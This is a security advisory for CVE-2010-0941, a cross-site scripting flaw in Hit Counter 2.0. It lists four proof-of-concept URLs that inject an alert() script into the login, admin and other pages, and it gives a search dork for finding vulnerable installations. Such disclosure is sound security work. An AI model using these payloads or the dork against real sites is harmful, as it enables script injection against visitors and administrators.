Topic : | Hit Counter 2.0 Cross Site Scripting Vulnerability
|
SecurityAlert : 7097
CVE : CVE-2010-0941
CWE : CWE-79
SecurityRisk : Low (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : Yes
Exploit Available : Yes
Credit : indoushka
Published : 10.03.2010
Affected Software : | web-site-development:etek_systems_hit_counter:2.0 |
 Advisory Content : ===========================================================================
=============
| # Title : Hit Counter Cross Site Scripting Vulnerability
| # Author : indoushka
| # email : indoushka@hotmail.com
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria
-(00213771818860)
| # Total alerts found : 4
| High : 4
| Medium :
| Low :
| Informational :
| # Web Site : www.iq-ty.com
| # Published:
| # Dork : Powered by Hit Counter v2.0 (c) eTek Systems
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix
Français v.(9.4 Ubuntu)
| # Bug : XSS
====================== Exploit By indoushka
=================================
# Exploit :
1- XSS (Cross Site Scripting in URI)
http://server/ww-hc20/index.php/>'><ScRiPt>alert(213771818860)</ScRiPt>
http://server/ww-hc20/inc/login.php/>'><ScRiPt>alert(213771818860)</ScRiPt>
http://server/ww-hc20/admin/index.php/>'><ScRiPt>alert(213771818860)</ScRiP
t>
http://server/ww-hc20/admin/forgot.php/>"><ScRiPt>alert(213771818860)</ScRi
Pt>
============== Dz-Ghost Team ========
References :
http://xforce.iss.net/xforce/xfdb/55285
http://www.osvdb.org/61444
http://www.osvdb.org/61443
http://www.osvdb.org/61442
http://www.exploit-db.com/exploits/10887
http://secunia.com/advisories/38052
http://packetstormsecurity.org/1001-exploits/hitcounter-xss.txt
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|